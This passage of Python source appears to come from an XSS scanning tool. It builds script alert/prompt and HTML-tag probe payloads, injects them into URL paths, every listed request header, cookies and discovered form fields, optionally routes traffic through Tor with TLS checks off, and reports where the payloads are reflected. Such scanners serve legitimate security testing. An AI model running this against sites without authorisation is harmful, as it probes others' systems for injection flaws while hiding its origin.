    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "<script>alert('The Silent')</script>"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "\\<script>alert('The Silent')</script>\\"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "&<script>alert('The Silent')</script>&"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "<SCRIPT>alert('THE SILENT')</SCRIPT>"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "\\<SCRIPT>alert('THE SILENT')</SCRIPT>\\"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "&<SCRIPT>alert('THE SILENT')</SCRIPT>&"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "<script>prompt('The Silent')</script>"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "\\<script>prompt('The Silent')</script>\\"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "&<script>prompt('The Silent')</script>&"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "<SCRIPT>prompt('THE SILENT')</SCRIPT>"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "\\<SCRIPT>prompt('THE SILENT')</SCRIPT>\\"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "&<SCRIPT>prompt('THE SILENT')</SCRIPT>&"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "<strong>The Silent</strong>"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "\\<strong>The Silent</strong>\\"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "&<strong>The Silent</strong>&"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "<STRONG>THE SILENT</STRONG>"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "\\<STRONG>THE SILENT</STRONG>\\"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    my_string = "&<STRONG>THE SILENT</STRONG>&"
    mal_payloads.append(urllib.parse.quote(str(my_string)))
    mal_payloads.append(my_string)

    return mal_payloads

# scans for xss
def xss_scanner(url, secure=True, tor=False, crawl="0", my_file=" ", parse=" ", delay=1):
    mal_payloads = return_mal_payloads()
    mal_scripts = [
        "<div>The Silent</div>",
        "<DIV>THE SILENT</DIV>",
        "<iframe>The Silent</iframe>",
        "<IFRAME>THE SILENT</IFRAME>",
        "<input type='text' id='TheSilent' name='TheSilent' value='TheSilent'>",
        "<INPUT TYPE='TEXT' ID='THESILENT' NAME='THESILENT' VALUE='THESILENT'>",
        "<p>The Silent</p>",
        "<P>THE SILENT</P>",
        "<script>alert('The Silent')</script>",
        "<SCRIPT>alert('THE SILENT')</SCRIPT>",
        "<script>prompt('The Silent')</script>",
        "<SCRIPT>prompt('THE SILENT')</SCRIPT>",
        "<strong>The Silent</strong>",
        "<STRONG>THE SILENT</STRONG>"]

    my_list = []

    clear()

    # crawl
    my_result = []

    if my_file == " ":
        my_result = link_scanner(
            url=url,
            secure=secure,
            tor=tor,
            crawl=crawl,
            parse=parse,
            delay=delay)

    if my_file != " ":
        with open(my_file, "r", errors="ignore") as file:
            for i in file:
                clean = i.replace("\n", "")
                my_result.append(clean)

    clear()

    for links in my_result:
        for mal_script in mal_payloads:
            try:
                if links.endswith("/"):
                    my_url = links + mal_script

                else:
                    my_url = links + "/" + mal_script

                print(CYAN + "checking: " + str(my_url))

                # prevent dos attacks
                time.sleep(delay)

                if tor:
                    result = web_session.get(my_url, verify=False, headers={"User-Agent": return_user_agent()}, proxies=tor_proxy, timeout=(60,120)).text

                else:
                    result = web_session.get(my_url, verify=False, headers={"User-Agent": return_user_agent()}, timeout=(5,30)).text

                for scripts in mal_scripts:
                    if scripts in result:
                        print(CYAN + "true: " + my_url)
                        my_list.append(my_url)
                        break

            except:
                print(
                    RED +
                    "ERROR! Connection Error! We may be IP banned or the server hasn't recoveRED! Waiting one minute before retrying!")
                time.sleep(60)
                continue

        client_headers = [
            "A-IM",
            "Accept",
            "Accept-Charset",
            "Accept-Datetime",
            "Accept-Encoding",
            "Accept-Language",
            "Access-Control-Request-Method",
            "Access-Control-Request-Headers",
            "Authorization",
            "Cache-Control",
            "Cookie",
            "Connection",
            "Content-Encoding",
            "Content-Length",
            "Content-MD5",
            "Content-Type",
            "Date",
            "Expect",
            "Forwarded",
            "From",
            "HTTP2-Settings",
            "If-Match",
            "If-Modified-Since",
            "If-None-Match",
            "If-Range",
            "If-Unmodified-Since",
            "Max-Forwards",
            "Origin",
            "Pragma",
            "Prefer",
            "Proxy-Authorization",
            "Range",
            "Referer",
            "TE",
            "Trailer",
            "Transfer-Encoding",
            "Via",
            "Warning"]

        for mal_script in mal_payloads:
            try:
                for http_header in client_headers:
                    user_agent_moded = {
                        "User-Agent": return_user_agent(),
                        http_header: mal_script}
                    print(
                        CYAN +
                        "checking: " +
                        str(links) +
                        " (headers) " +
                        str(user_agent_moded))

                    # prevent dos attacks
                    time.sleep(delay)

                    if tor:
                        result = web_session.get(links, verify=False, headers=user_agent_moded, proxies=tor_proxy, timeout=(60,120)).text

                    else:
                        result = web_session.get(links, verify=False, headers=user_agent_moded, timeout=(5,30)).text

                    for scripts in mal_scripts:
                        if scripts in result:
                            print(
                                CYAN +
                                "true: " +
                                str(links) +
                                " (headers) " +
                                str(user_agent_moded))
                            my_list.append(
                                str(links) + " (headers) " + str(user_agent_moded))
                            break

            except:
                print(
                    RED +
                    "ERROR! Connection Error! We may be IP banned or the server hasn't recoveRED! Waiting one minute before retrying!")
                time.sleep(60)
                continue

        for mal_script in mal_payloads:
            try:
                mal_cookie = {mal_script: mal_script}
                print(
                    CYAN +
                    "checking: " +
                    str(links) +
                    " (cookies) " +
                    str(mal_cookie))

                # prevent dos attacks
                time.sleep(delay)

                if tor:
                    result = web_session.get(links, verify=False, headers={"User-Agent": return_user_agent()}, cookies=mal_cookie, proxies=tor_proxy, timeout=(60,120)).text

                else:
                    result = web_session.get(links, verify=False, headers={"User-Agent": return_user_agent()}, cookies=mal_cookie, timeout=(5,30)).text

                for scripts in mal_scripts:
                    if scripts in result:
                        print(CYAN + "true: " + links + " (cookie) " + scripts)
                        my_list.append(links + " (cookie) " + scripts)
                        break

            except:
                print(
                    RED +
                    "ERROR! Connection Error! We may be IP banned or the server hasn't recoveRED! Waiting one minute before retrying!")
                time.sleep(60)
                continue

        time.sleep(delay)
        print(CYAN + "checking for forms on: " + links)
        clean = links.replace("http://", "")
        clean = clean.replace("https://", "")

        form_input = form_scanner(clean, secure=secure, tor=tor, parse="input")
        form_activities = form_scanner(clean, secure=secure, tor=tor)

        for activity in form_activities:
            for i in form_input:
                try:
                    time.sleep(delay)
                    for mal_script in mal_payloads:
                        name = re.findall("name=\"(\\S+)\"", i)
                        mal_dict = {name[0]: mal_script}

                        if name[0] in activity:
                            action = re.findall("action=\"(\\S+)\"", activity)
                            method = re.findall("method=\"(\\S+)\"", activity)

                            if action[0] != "":
                                if links.endswith(
                                        "/") and action[0] != links + "/" or links.endswith("/") and action[0] != links:
                                    my_link = links + action[0]

                                elif action[0] == links + "/" or action[0] == links:
                                    my_link = links

                                else:
                                    my_link = links + "/" + action[0]

                            else:
                                my_link = links

                            print(
                                CYAN +
                                "checking: " +
                                str(my_link) +
                                " " +
                                str(mal_dict))

                            # prevent dos attacks
                            time.sleep(delay)

                            if tor:
                                if method[0].lower() == "get":
                                    get = web_session.get(my_link, params=mal_dict, verify=False, headers={"User-Agent": return_user_agent()}, proxies=tor_proxy, timeout=(60,120)).text
                                    for scripts in mal_scripts:
                                        if scripts in get:
                                            print(
                                                CYAN + "true: " + str(my_link) + " {" + str(name[0]) + ":" + scripts + "}")
                                            my_list.append(
                                                str(my_link) + " {" + str(name[0]) + ":" + scripts + "}")
                                            break

                                if method[0].lower() == "post":
                                    post = web_session.post(my_link, data=mal_dict, verify=False, headers={"User-Agent": return_user_agent()}, proxies=tor_proxy, timeout=(60,120)).text
                                    for scripts in mal_scripts:
                                        if scripts in post:
                                            print(
                                                CYAN + "true: " + str(my_link) + " {" + str(name[0]) + ":" + scripts + "}")
                                            my_list.append(
                                                str(my_link) + " {" + str(name[0]) + ":" + scripts + "}")
                                            break

                            else:
                                if method[0].lower() == "get":
                                    get = web_session.get(my_link, params=mal_dict, verify=False, headers={"User-Agent": return_user_agent()}, timeout=(5,30)).text

                                    for scripts in mal_scripts:
                                        if scripts in get:
                                            print(
                                                CYAN + "true: " + str(my_link) + " {" + str(name[0]) + ":" + scripts + "}")
                                            my_list.append(
                                                str(my_link) + " {" + str(name[0]) + ":" + scripts + "}")
                                            break

                                if method[0].lower() == "post":
                                    post = web_session.post(my_link, data=mal_dict, verify=False, headers={"User-Agent": return_user_agent()}, timeout=(5,30)).text

                                    for scripts in mal_scripts:
                                        if scripts in post:
                                            print(
                                                CYAN + "true: " + str(my_link) + " {" + str(name[0]) + ":" + scripts + "}")
                                            my_list.append(
                                                str(my_link) + " {" + str(name[0]) + ":" + scripts + "}")
                                            break

                except:
                    print(
                        RED +
                        "ERROR! Connection Error! We may be IP banned or the server hasn't recoveRED! Waiting one minute before retrying!")
                    time.sleep(60)
                    continue

    print(CYAN + "")
    clear()

    my_list = sorted(set(my_list))

    return my_list
